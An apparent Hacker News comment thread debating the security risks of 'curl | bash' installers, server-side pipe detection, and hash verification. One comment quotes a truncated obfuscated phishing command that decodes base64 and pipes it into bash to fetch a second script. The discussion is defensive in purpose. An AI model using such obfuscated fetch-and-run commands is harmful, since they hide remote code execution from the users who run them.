Remix.run Logo
Remix clone Hacker News
new | show | ask | jobsGithub
jjgreen 2 days ago

Splendid idea, especially since "curl | bash" can be detected on the server [1] (which if compromised could serve hostile content to only those who do it)

[1] https://web.archive.org/web/20250622061208/http://idontplayd...

IshKebab 2 days ago | parent | next [-]

This is one of those theoretical issues that has absolutely no practical implications.

dgl a day ago | parent [-]

Here's an example of a phish actually using it: https://abyssdomain.expert/@filippo/114868224898553428 (also note "cat" is potentially another antipattern, less -U or cat -v is what you want).

IshKebab 19 hours ago | parent [-]

Sure so how many people do you think saw `echo "Y3Vy[...]ggJg==" | base64 -d | bash` and thought "hmm that's suspicious, I'd better check what it is is doing... Ah it's curling another bash script. I'd better see what that script is. Downloads script. Ah I see, a totally legit script. All is well, I'll run the command!"

Its zero. Zero people. Nobody is competent enough to download and review a bash script and also not recognise this obvious scam.

They probably threw the pipe detection in just because they could (and because it's talked about so frequently).

falcor84 2 days ago | parent | prev | next [-]

Yes, ... but if the server is compromised, they could also just inject malware directly into the binary that it's installing, right? As I see it, at the end of the day you're only safe if you're directly downloading a package whose hash you can confirm via a separate trusted source. Anything else puts you at the mercy of the server you're downloading from.

sim7c00 2 days ago | parent [-]

depending on what you run one method might have more success than another. protections for malicious scripts vs. modified binaries are often different tools or different components of the same tool that can have varying degrees of success.

you could also use the script to fingerprint and beacon to check if the target is worth it and what you might want to inject into said binary if thats your pick.

still i think i agree, if you gonna trust a binary from that server or a scripts its potato potato...

check what you run before you run it with whatever tools or skills u got and hope for the best.

if you go deepest into this rabbithole, you cant trust your hard disk or network card etc. so its then at some point just impossible to do anyhting. microcode patches, malicious firmwares, whatever.

for pragmatic reasons line needs to be drawn. if your paranoid good luck and dont learn too much about cybersecurity, or you will need to build your own computer :p

2 days ago | parent | prev [-]
[deleted]